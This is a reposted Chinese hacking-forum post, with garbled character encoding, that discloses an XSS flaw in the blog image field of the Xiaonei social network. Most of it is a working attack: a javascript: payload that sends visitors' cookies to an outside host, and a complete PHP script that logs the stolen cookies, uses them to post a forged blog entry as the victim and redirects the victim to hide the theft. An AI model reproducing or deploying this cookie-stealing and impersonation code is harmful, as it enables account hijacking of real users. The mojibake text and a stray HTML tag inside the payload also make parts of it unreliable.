From:http://t00ls.net/viewthread.php?tid=1323&highlight=

校內(nèi)網(wǎng)在發(fā)blog時(shí)對(duì)插入圖片過(guò)濾不嚴(yán)格，存在xss漏洞.

在發(fā)blog時(shí)將插入圖片URL寫(xiě)為如下代碼即可觸發(fā)：普通瀏覽復(fù)制代碼打印代碼
javascript:window.location.href='http://www.xxx.com/test.<SPAN class=t_tag xxxxx=tagshow(event) href="tag.php?name=php">php</SPAN>?cookie='+document.cookie

javascript:window.location.+document.cookie test.php的作用是竊取cookie、偽造閱覽者身份發(fā)一個(gè)blog、跳轉(zhuǎn)到一個(gè)正常的日志,代碼如下:普通瀏覽復(fù)制代碼打印代碼
<?php
ob_start();
$url = 'blog.xiaonei.com';
$cookie=$_GET['cookie'];
$cookie1=$cookie."\r\n\r\n";
fputs(fopen('a.txt','a+'),$cookie1); //cookie寫(xiě)入 a.txt
//發(fā)一條偽造的日志，這條日志里面也可以插入惡意代碼
$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
$data = "title=test by fly&body=test by fly&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=&pic_path=&activity=&id=&relative_optpe=";
fwrite($sock, "POST http://$url/NewEntry.do HTTP/1.1\r\n");
fwrite($sock, "Accept: */*\r\n");
fwrite($sock, "Referer: http://$url\r\n");
fwrite($sock, "Accept-Language: zh-cn\r\n");
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
fwrite($sock, "User-Agent: Mozilla\r\n");
fwrite($sock, "Host: $url\r\n");
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
fwrite($sock, "Connection: Keep-Alive\r\n");
fwrite($sock, "Cache-Control: no-cache\r\n");
fwrite($sock, "Cookie:".$cookie."\r\n\r\n");
fwrite($sock, $data);
$headers = "";
while ($str = trim(fgets($sock, 4096)))
$headers .= "$str\n";
echo "\n";
$body = "";
while (!feof($sock))
$body .= fgets($sock, 4096);
fclose($sock);
//echo $body;
//跳轉(zhuǎn)到一個(gè)正常的日志
Header("Location: http://blog.xiaonei.com/GetEntry.do?id=xxxx&owner=xxxxx");
ob_end_flush();
?>

最新評(píng)論